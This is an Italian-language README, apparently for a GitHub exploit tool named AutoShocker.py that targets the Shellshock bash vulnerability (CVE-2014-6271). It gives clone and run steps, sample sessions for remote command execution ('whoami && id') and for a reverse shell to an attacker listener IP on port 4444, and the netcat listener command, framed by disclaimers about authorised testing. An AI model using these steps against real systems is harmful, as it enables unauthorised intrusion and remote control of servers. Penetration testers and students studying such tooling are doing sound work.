
Script di automazione per sfruttare la vulnerabilità Shellshock.
Questo script Python sfrutta la vulnerabilità Shellshock (CVE-2014-6271) per eseguire comandi in remoto o stabilire una reverse shell su un target vulnerabile. 🛠️⚠️
Questo script è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato contro sistemi per i quali non si ha esplicita autorizzazione è illegale e non etico. Ottenere sempre la debita autorizzazione prima di effettuare qualsiasi test di sicurezza. ⚠️🛑🚔
curl installato sul proprio sistema.Clonare il repository:
git clone https://github.com/YunchoHang/CVE-2014-6271-SHELLSHOCK.git
cd CVE-2014-6271-SHELLSHOCK
Eseguire lo script:
python3 AutoShocker.py
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 1
Enter the commands you want to execute: whoami && id
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 2
Enter your IP (listener): 192.168.1.200
Enter the port for reverse shell (e.g., 4444): 4444
Avviare il listener sulla propria macchina:
nc -lvnp 4444
Questo progetto è solo per scopi educativi. L'autore non è responsabile per qualsiasi uso improprio. 📖⚠️🔍